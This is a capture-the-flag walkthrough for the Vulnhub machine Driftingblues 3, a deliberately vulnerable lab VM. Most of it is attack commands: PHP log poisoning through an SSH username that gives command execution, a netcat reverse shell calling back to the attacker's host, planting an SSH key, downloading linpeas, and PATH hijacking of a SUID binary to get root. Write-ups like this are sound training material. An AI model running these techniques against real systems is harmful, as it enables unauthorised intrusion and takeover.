Vulnhub – Driftingblues 3 – Walkthrough – Writeup
Previous machine walkthrough: Vulnhub – Driftingblues 2 – Walkthrough
Link of this machine: https://www.vulnhub.com/entry/driftingblues-3,656/
Foothold
fping
fping -aqg 10.0.2.0/24 # target identified as 10.0.2.10nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.10 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -p$ports -sC -sV 10.0.2.10
We saw some interesting entries in nmap. Let’s visit the link.
We found a message in the link.
man there's a problem with ssh
john said "it's poisonous!!! stay away!!!"
idk if he's mentally challenged
please find and fix it
also check /littlequeenofspades.html
your buddy, buddyGLet’s check this new link /littlequeenofspades.html as well. On the page, I didn’t find anything, but on the source page, there is a base64 encoded comment.
As you see above, there is another base64 that has the message. So, let’s take a look at that page.
It looks like, the logs are being generated on that page.
As you can see, the username is also displayed on the page. If you can inject some PHP code instead of the user, then that would result in remote code execution. For this purpose, we have the command system. We can simply inject a code in the log which would again take commands from a get parameter.
ssh '<?php system($_GET["c"]); ?>'@10.0.2.10Now, we can run any command from the link in the format 10.0.2.10/adminsfixit.php?c=
Let’s list the files.
We got it. Now, it’s simple. We have to open a reverse shell. So, let’s check for nc. To do that we have to the command as which nc. It appears as if the server has nc. So, we are going to listen on port 4444 on our local machine and invoke the reverse shell using the php file.
On local machine.
nc -nlvp 4444On attacker machine.
10.0.2.10/adminsfixit.php?c=nc 10.0.2.15 4444 -e /bin/bash
We got the reverse shell. Now, let’s spawn a pty shell.
which python # gave us python path
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xtermNow, doing Ctrl+Z will send the session to background. Then in that terminal we can set some stty commands.
stty raw -echo;fg
reset
# type xterm if prompted for terminal type
stty columns 178 rows 98Privilege User
ls -al /home # lists a user robertj
cd /home/robertj
ls -al # we have a user.txt file without read permission for other user
# we also have .ssh directory
So, we can add our ssh public key to a file authorized_keys and login using robertjs from ssh. We have to change permission so that robertj could write on the file.
cd .ssh
echo __your ssh public key__ > authorized_keys
chmod 777 authorized_keysNow, let’s log in using ssh from our local machine.
ssh robertj@10.0.2.10 -i .ssh/id_rsa # the private key - usually under .ssh folder in your home
We got the shell from user robertj. Let’s view the flag.
cat user.txt
Privilege Root
We will be using linpeas.sh for enumerating Linux. You actually don’t need that. You can skip this part and use the find command that I have written below this.
For using linpeas.sh:
On local machine.
python3 -m http.server 8080 # you should have linpeas.sh on the directoryOn target machine.
wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.shNow, execute linpeas.sh and save the output to a file.
./linpeas.sh | tee output
We actually found a binary that has suid permission as root. That is the main purpose.
Using the find command:
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
Let’s see what it does.
It looks like, the command further calls the other three commands. So, in this case, we can serve a directory (/tmp) in the path and add a custom binary of the names used. We will begin with ip.
export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfoWe got the root shell and we got the flag.
